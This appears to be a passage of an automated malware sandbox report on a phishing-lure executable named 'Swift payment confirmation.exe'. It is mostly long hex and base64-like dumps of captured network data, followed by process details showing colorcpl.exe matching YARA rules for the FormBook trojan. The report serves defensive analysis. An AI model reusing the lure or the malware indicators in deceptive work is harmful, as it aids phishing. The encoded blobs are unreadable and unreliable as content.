                                                                              2024-10-31 08:07:07 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 50 45 52 45 6b 47 53 55 50 4a 42 55 59 46 79 49 69 4a 79 45 68 45 78 77 55 45 42 4d 51 47 43 63 6d 49 78 38 62 4a 51 34 65 46 79 4d 65 48 78 73 68 48 42 59 63 4a 78 63 6e 44 69 41 4f 46 78 41 6e 49 69 45 6e 46 52 4d 54 46 79 45 4f 46 52 59 65 48 78 67 69 4a 79 63 68 48 68 6f 4f 49 42 38 64 48 52 6b 53 4a 52 63 52 49 43 51 55 4a 79 49 6e 47 79 55 4f 47 68 45 5a 4a 78 45 69 4a 68 71 6d 72 71 56 5a 49 36 65 78 53 31 4d 56 45 68 38 54 47 43 41 6b 44 79 63 56 70 71 36 6c 57 53 4f 6e 73 55 75 36 74 4c 53 6e 72 4b 43 36 70 37 43 7a 73 71 57 6c 6f 71 53 6b 74 71 2b 33 75 37 61 37 73 36 4b 68 70 71 71 75 6f 4c 6d 70 73 71 61 70 71 71 36 6b 72 37 47 76 6f 72 4b 69 75 61 75 35 73 72 75 69 70 61 53 69 73 4c 61 32 73 71 53 35 73 4c 47
                                                                              Data Ascii: pq6lWSOnsUsPEREkGSUPJBUYFyIiJyEhExwUEBMQGCcmIx8bJQ4eFyMeHxshHBYcJxcnDiAOFxAnIiEnFRMTFyEOFRYeHxgiJychHhoOIB8dHRkSJRcRICQUJyInGyUOGhEZJxEiJhqmrqVZI6exS1MVEh8TGCAkDycVpq6lWSOnsUu6tLSnrKC6p7CzsqWloqSktq+3u7a7s6KhpqquoLmpsqapqq6kr7GvorKiuau5sruipaSisLa2sqS5sLG
                                                                              2024-10-31 08:07:07 UTC460INData Raw: 33 70 67 56 64 78 6d 69 4a 61 77 4e 77 62 50 4c 6c 64 67 6c 6b 45 79 67 6d 4e 4b 70 65 38 33 66 51 64 6e 32 34 46 4d 56 37 44 30 58 78 78 43 4f 53 6b 42 45 74 56 65 62 4c 56 4b 6b 35 70 75 44 33 52 31 48 45 76 65 37 68 66 2f 4f 44 6e 47 6f 48 66 76 65 67 75 71 53 52 71 4b 7a 4b 53 44 64 35 30 7a 51 47 37 68 50 74 71 63 6b 79 72 4a 55 34 4e 61 4a 72 63 6b 64 53 6a 49 61 2b 58 6c 58 31 31 6f 6b 31 38 31 73 32 71 6a 35 52 4d 72 4c 74 4b 54 7a 51 75 63 4b 38 46 37 38 75 59 5a 36 37 73 4a 43 65 70 39 67 74 47 7a 75 6f 58 6a 63 63 4c 55 5a 33 32 41 39 56 64 65 65 54 2f 61 61 2b 72 38 61 56 6d 34 41 4b 37 62 71 30 69 71 68 54 50 46 61 43 6c 35 63 76 6e 2b 6d 55 34 6d 43 37 77 34 4e 43 62 64 75 39 7a 6c 31 33 38 51 54 43 4c 34 4c 36 77 5a 68 2b 49 43 6e 74 43 58
                                                                              Data Ascii: 3pgVdxmiJawNwbPLldglkEygmNKpe83fQdn24FMV7D0XxxCOSkBEtVebLVKk5puD3R1HEve7hf/ODnGoHfveguqSRqKzKSDd50zQG7hPtqckyrJU4NaJrckdSjIa+XlX11ok181s2qj5RMrLtKTzQucK8F78uYZ67sJCep9gtGzuoXjccLUZ32A9VdeeT/aa+r8aVm4AK7bq0iqhTPFaCl5cvn+mU4mC7w4NCbdu9zl138QTCL4L6wZh+ICntCX
                                                                              2024-10-31 08:07:07 UTC16384INData Raw: 4a 51 64 31 39 38 42 46 68 35 6c 4e 61 7a 58 73 45 68 75 52 53 47 64 4a 45 54 56 56 45 72 70 30 53 74 52 56 75 50 66 49 7a 6e 30 79 72 58 68 72 44 37 7a 6d 38 6a 61 49 4c 35 44 56 56 4b 44 67 52 62 53 76 58 4e 4c 4d 77 41 39 61 33 48 62 37 46 30 6d 44 5a 6e 6e 44 75 37 32 56 4f 6a 36 5a 74 37 47 65 7a 41 4b 70 61 38 36 33 65 35 6c 32 65 36 2f 31 55 75 70 4c 50 36 2b 48 58 4a 30 46 64 64 4e 58 4c 70 7a 6d 6a 5a 55 70 67 72 63 59 6e 64 59 73 30 6c 4b 4e 2f 30 4f 6c 42 64 75 6a 6d 53 39 31 52 45 55 63 34 43 73 38 66 43 4b 79 36 66 6b 32 77 6f 6e 4c 56 77 4f 4e 78 55 63 6f 4a 4e 79 51 57 53 64 68 61 41 4e 43 70 34 62 35 64 5a 58 47 37 31 33 57 4c 6f 44 42 4f 70 6e 75 43 35 33 6e 73 76 73 6b 47 43 79 6c 37 38 32 56 36 43 54 48 54 72 32 2f 32 39 2b 64 71 32 71
                                                                              Data Ascii: JQd198BFh5lNazXsEhuRSGdJETVVErp0StRVuPfIzn0yrXhrD7zm8jaIL5DVVKDgRbSvXNLMwA9a3Hb7F0mDZnnDu72VOj6Zt7GezAKpa863e5l2e6/1UupLP6+HXJ0FddNXLpzmjZUpgrcYndYs0lKN/0OlBdujmS91REUc4Cs8fCKy6fk2wonLVwONxUcoJNyQWSdhaANCp4b5dZXG713WLoDBOpnuC53nsvskGCyl782V6CTHTr2/29+dq2q
                                                                              2024-10-31 08:07:07 UTC1024INData Raw: 4a 75 49 77 4a 62 62 6e 59 44 5a 32 64 72 77 2b 37 39 54 58 6a 48 64 58 64 38 35 71 57 6c 48 68 2f 66 2b 59 2f 30 4b 2b 35 78 36 6a 6e 36 4f 4a 71 32 68 79 51 55 45 71 74 4b 7a 71 4a 49 2b 56 69 2b 47 62 4a 75 67 6f 7a 4a 6a 5a 32 59 42 55 46 61 45 36 4a 56 65 55 77 59 6d 72 77 35 6a 36 7a 55 62 36 57 7a 6b 59 52 32 56 4a 61 41 71 76 6f 6a 31 36 38 6e 36 31 6e 46 69 34 7a 62 47 66 68 32 45 64 68 44 7a 2f 63 4f 6f 6f 63 6d 6f 4e 4f 42 66 50 33 75 6e 37 62 72 45 46 4c 6f 74 75 79 53 70 69 56 65 33 2b 45 54 52 34 4d 33 6b 43 4a 74 78 56 78 65 36 6b 35 59 53 62 65 56 4d 54 6c 74 66 31 33 44 57 6b 79 76 6e 5a 45 45 77 2f 51 4c 54 31 4c 38 65 34 5a 6f 37 6c 68 6f 79 30 68 62 73 4e 59 6a 42 4d 76 4d 53 45 49 75 49 50 56 4e 52 64 39 4f 33 2f 6a 6d 4c 4e 4d 44 61
                                                                              Data Ascii: JuIwJbbnYDZ2drw+79TXjHdXd85qWlHh/f+Y/0K+5x6jn6OJq2hyQUEqtKzqJI+Vi+GbJugozJjZ2YBUFaE6JVeUwYmrw5j6zUb6WzkYR2VJaAqvoj168n61nFi4zbGfh2EdhDz/cOoocmoNOBfP3un7brEFLotuySpiVe3+ETR4M3kCJtxVxe6k5YSbeVMTltf13DWkyvnZEEw/QLT1L8e4Zo7lhoy0hbsNYjBMvMSEIuIPVNRd9O3/jmLNMDa
                                                                              2024-10-31 08:07:07 UTC16384INData Raw: 76 56 6a 54 50 33 66 48 41 55 49 45 2b 46 52 49 2b 56 65 46 78 57 56 6b 71 54 4f 63 72 39 73 53 43 50 78 58 33 51 6a 2f 61 47 34 7a 54 50 73 46 73 4f 63 75 6a 50 6a 55 45 61 48 45 76 42 65 76 75 30 57 33 59 48 77 45 54 69 6e 41 50 41 41 74 46 6e 52 34 35 65 52 46 4c 63 32 36 6a 61 54 44 49 66 59 51 43 44 77 55 79 73 6c 46 48 48 78 42 51 35 48 76 6b 5a 43 75 6b 66 69 74 42 5a 43 38 69 75 35 79 6d 59 39 35 4b 33 69 46 47 74 57 78 45 70 45 6c 59 4b 65 31 69 6d 61 6e 6a 68 61 50 74 36 73 58 42 57 4b 45 58 68 57 7a 4c 77 54 33 41 52 52 70 6b 52 35 36 72 2b 31 4a 72 41 66 32 56 75 62 38 79 6e 50 61 44 77 4e 47 50 76 6c 6d 38 4f 51 4e 49 79 75 56 62 61 48 30 46 51 59 57 38 55 44 54 4d 50 58 61 48 75 35 75 59 30 67 4c 4c 62 33 71 50 43 6c 53 2f 44 34 4b 32 7a 48
                                                                              Data Ascii: vVjTP3fHAUIE+FRI+VeFxWVkqTOcr9sSCPxX3Qj/aG4zTPsFsOcujPjUEaHEvBevu0W3YHwETinAPAAtFnR45eRFLc26jaTDIfYQCDwUyslFHHxBQ5HvkZCukfitBZC8iu5ymY95K3iFGtWxEpElYKe1imanjhaPt6sXBWKEXhWzLwT3ARRpkR56r+1JrAf2Vub8ynPaDwNGPvlm8OQNIyuVbaH0FQYW8UDTMPXaHu5uY0gLLb3qPClS/D4K2zH
                                                                              2024-10-31 08:07:07 UTC1024INData Raw: 4c 2f 49 53 37 39 2f 5a 43 62 56 48 50 43 4b 2f 4c 44 48 2f 2f 57 57 50 4f 36 43 68 58 4d 6e 4c 34 72 57 37 2b 79 4f 78 36 4a 75 79 75 57 55 52 46 70 67 4a 46 39 41 56 6d 6f 45 36 6e 46 37 76 47 48 71 5a 64 36 4d 49 74 5a 2b 35 74 56 62 75 63 38 6e 2f 70 4c 6d 59 4c 4e 37 38 56 64 70 69 44 6c 7a 38 38 6f 38 59 39 6b 59 66 4e 56 50 63 4b 76 2b 55 7a 39 52 74 53 6b 53 34 58 49 6d 4b 44 66 52 6f 56 65 41 63 61 4a 30 36 59 61 2f 43 38 50 65 31 74 69 33 74 35 66 69 58 77 2f 76 77 76 6d 4b 52 4d 30 45 77 53 48 4a 6c 71 73 6d 4d 46 73 59 6d 63 56 66 4c 52 76 4e 63 4d 61 71 79 58 66 35 72 6a 4d 31 63 39 62 39 30 6d 55 38 44 36 53 38 6c 41 4b 53 71 38 6f 39 56 62 68 6a 35 44 50 32 4a 49 72 43 73 39 70 46 51 67 6f 35 5a 77 68 56 62 59 34 45 69 54 44 32 56 55 32 6b
                                                                              Data Ascii: L/IS79/ZCbVHPCK/LDH//WWPO6ChXMnL4rW7+yOx6JuyuWURFpgJF9AVmoE6nF7vGHqZd6MItZ+5tVbuc8n/pLmYLN78VdpiDlz88o8Y9kYfNVPcKv+Uz9RtSkS4XImKDfRoVeAcaJ06Ya/C8Pe1ti3t5fiXw/vwvmKRM0EwSHJlqsmMFsYmcVfLRvNcMaqyXf5rjM1c9b90mU8D6S8lAKSq8o9Vbhj5DP2JIrCs9pFQgo5ZwhVbY4EiTD2VU2k
                                                                              2024-10-31 08:07:07 UTC1795INData Raw: 4e 4d 35 42 4a 4d 37 51 63 6f 73 56 74 32 4b 78 38 38 5a 6c 71 34 61 4b 49 4e 30 49 53 73 55 41 62 54 54 52 57 6f 66 48 75 6c 77 47 2f 58 76 53 4d 4c 66 6c 6c 4c 55 63 61 79 2f 45 51 69 33 55 55 56 4f 4b 47 68 2f 62 32 4c 34 6d 64 30 64 37 68 6e 39 53 55 52 52 42 4a 46 47 50 4a 4b 68 68 54 75 58 67 58 6f 49 4e 76 31 64 44 53 6a 6b 77 47 42 34 4e 37 72 72 44 49 67 4c 6b 4c 42 63 72 4e 6d 79 76 58 46 4e 47 72 30 63 6b 39 2b 50 45 42 4f 4a 6b 46 57 4a 50 6f 63 37 6f 37 53 6a 78 77 70 48 68 6d 63 6d 6d 72 36 37 51 65 35 6a 57 57 31 75 65 63 45 4e 56 76 45 64 30 42 35 6f 38 77 51 75 6b 6d 30 31 78 66 71 79 46 4c 58 39 4a 31 37 34 35 50 69 4d 43 75 5a 73 78 56 74 2b 39 79 6e 45 46 7a 33 42 38 64 45 68 75 45 78 6a 41 45 4f 59 73 64 47 53 43 66 66 6e 52 47 6b 2f
                                                                              Data Ascii: NM5BJM7QcosVt2Kx88Zlq4aKIN0ISsUAbTTRWofHulwG/XvSMLfllLUcay/EQi3UUVOKGh/b2L4md0d7hn9SURRBJFGPJKhhTuXgXoINv1dDSjkwGB4N7rrDIgLkLBcrNmyvXFNGr0ck9+PEBOJkFWJPoc7o7SjxwpHhmcmmr67Qe5jWW1uecENVvEd0B5o8wQukm01xfqyFLX9J1745PiMCuZsxVt+9ynEFz3B8dEhuExjAEOYsdGSCffnRGk/
                                                                              2024-10-31 08:07:07 UTC9000INData Raw: 62 69 39 6e 75 69 61 4e 6b 39 62 54 52 77 4d 31 37 54 47 72 6e 67 4e 4e 57 6e 6e 77 46 67 63 71 4c 73 63 4e 2f 61 4d 77 38 78 68 48 6f 78 57 4e 52 66 4f 6c 64 71 42 4c 44 74 48 54 52 77 56 6f 35 4e 4d 66 74 2f 4a 54 2f 6a 4a 79 72 57 68 72 54 49 71 78 2f 44 5a 39 46 37 4e 32 6e 4d 56 41 33 79 74 53 78 68 43 52 52 69 6b 42 36 37 31 56 56 72 50 54 73 4e 64 45 63 57 4c 43 78 47 79 6e 75 37 74 5a 68 74 47 62 7a 75 2b 39 7a 58 35 44 4a 5a 2b 78 70 4d 56 5a 54 50 50 73 74 4f 62 70 39 53 47 47 64 4c 62 57 61 67 6e 42 75 63 45 38 57 69 58 6a 75 43 7a 4a 57 65 5a 41 38 69 56 4b 6b 42 6e 34 34 77 4e 44 70 39 4c 4d 32 41 78 58 5a 6a 52 6d 37 79 65 5a 75 73 53 31 4b 4d 49 4c 74 30 47 4c 67 51 6f 55 30 49 47 59 2b 36 4f 67 74 64 6a 52 6c 57 4c 6a 77 48 2b 6e 52 63 31
                                                                              Data Ascii: bi9nuiaNk9bTRwM17TGrngNNWnnwFgcqLscN/aMw8xhHoxWNRfOldqBLDtHTRwVo5NMft/JT/jJyrWhrTIqx/DZ9F7N2nMVA3ytSxhCRRikB671VVrPTsNdEcWLCxGynu7tZhtGbzu+9zX5DJZ+xpMVZTPPstObp9SGGdLbWagnBucE8WiXjuCzJWeZA8iVKkBn44wNDp9LM2AxXZjRm7yeZusS1KMILt0GLgQoU0IGY+6OgtdjRlWLjwH+nRc1
                                                                              2024-10-31 08:07:07 UTC16384INData Raw: 6d 2b 30 4f 68 4f 53 51 65 34 65 48 48 51 54 34 4f 4b 76 4c 35 78 4a 48 66 58 73 2b 50 57 35 4d 4e 53 52 37 31 49 45 72 69 51 42 77 65 57 6a 6c 4e 4b 66 2b 36 4e 4d 52 4b 47 78 35 32 6c 48 69 64 59 55 66 4f 63 71 76 30 76 5a 43 69 2f 32 65 77 67 58 48 2f 54 46 65 73 73 56 55 5a 30 2f 2b 70 30 57 47 48 64 38 6b 51 47 44 59 68 4c 32 4f 37 64 47 77 63 51 38 46 4f 50 75 72 4b 48 7a 4d 59 59 47 5a 74 70 48 31 63 62 7a 51 35 4a 76 77 6e 32 65 43 72 48 79 62 6e 51 48 4d 39 4c 48 64 32 50 70 73 63 75 7a 2f 78 77 46 6a 74 5a 58 32 33 6a 48 6b 69 67 4a 30 34 63 6d 7a 48 6a 4a 32 6a 74 6b 37 78 4f 6c 61 4c 65 57 51 31 54 48 42 50 44 68 6c 53 6d 77 71 4d 38 38 58 33 6e 47 69 71 34 71 70 36 61 2f 74 64 6e 4e 57 78 59 31 50 4e 51 79 58 76 37 56 39 52 67 72 47 64 4c 6b
                                                                              Data Ascii: m+0OhOSQe4eHHQT4OKvL5xJHfXs+PW5MNSR71IEriQBweWjlNKf+6NMRKGx52lHidYUfOcqv0vZCi/2ewgXH/TFessVUZ0/+p0WGHd8kQGDYhL2O7dGwcQ8FOPurKHzMYYGZtpH1cbzQ5Jvwn2eCrHybnQHM9LHd2Ppscuz/xwFjtZX23jHkigJ04cmzHjJ2jtk7xOlaLeWQ1THBPDhlSmwqM88X3nGiq4qp6a/tdnNWxY1PNQyXv7V9RgrGdLk
                                                                              2024-10-31 08:07:07 UTC1024INData Raw: 39 69 2b 35 70 43 6b 6c 2b 5a 55 2b 69 59 65 41 76 6c 43 6e 61 67 68 74 56 32 54 6f 68 63 33 6c 62 68 51 5a 4a 71 6f 4a 58 37 56 2b 4f 2f 30 32 55 4d 5a 4f 75 53 4d 6c 65 78 79 4c 54 5a 42 2f 6f 30 70 48 61 70 2b 54 47 55 4c 37 58 4f 54 30 51 32 48 66 2b 32 65 42 6c 4f 48 33 47 59 39 41 6b 4f 41 4e 5a 34 41 74 55 56 54 50 55 50 57 72 37 44 33 62 61 5a 77 2b 69 30 73 39 56 79 6a 78 32 37 48 48 72 37 63 61 34 47 4f 68 4c 33 36 2f 69 5a 7a 56 31 4d 2f 44 41 78 63 4e 76 4b 76 7a 48 6a 78 53 72 63 32 56 65 30 63 62 39 78 68 35 7a 62 56 30 6d 6f 68 75 55 30 5a 71 53 6f 66 5a 71 51 68 6d 55 48 46 55 4a 64 4c 2f 42 6c 78 5a 38 72 67 4e 56 31 71 6b 64 59 38 79 70 2b 6e 78 67 57 39 43 67 39 59 32 53 67 53 42 57 4c 39 69 4e 64 34 39 4f 33 6e 50 62 66 62 73 48 50 61
                                                                              Data Ascii: 9i+5pCkl+ZU+iYeAvlCnaghtV2Tohc3lbhQZJqoJX7V+O/02UMZOuSMlexyLTZB/o0pHap+TGUL7XOT0Q2Hf+2eBlOH3GY9AkOANZ4AtUVTPUPWr7D3baZw+i0s9Vyjx27HHr7ca4GOhL36/iZzV1M/DAxcNvKvzHjxSrc2Ve0cb9xh5zbV0mohuU0ZqSofZqQhmUHFUJdL/BlxZ8rgNV1qkdY8yp+nxgW9Cg9Y2SgSBWL9iNd49O3nPbfbsHPa


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:04:06:55
                                                                              Start date:31/10/2024
                                                                              Path:C:\Users\user\Desktop\Swift payment confirmation.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Swift payment confirmation.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'033'216 bytes
                                                                              MD5 hash:92FDCC36BE7B26D49F67F2F02FEFBF07
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:04:07:08
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\colorcpl.exe
                                                                              Imagebase:0x660000
                                                                              File size:86'528 bytes
                                                                              MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >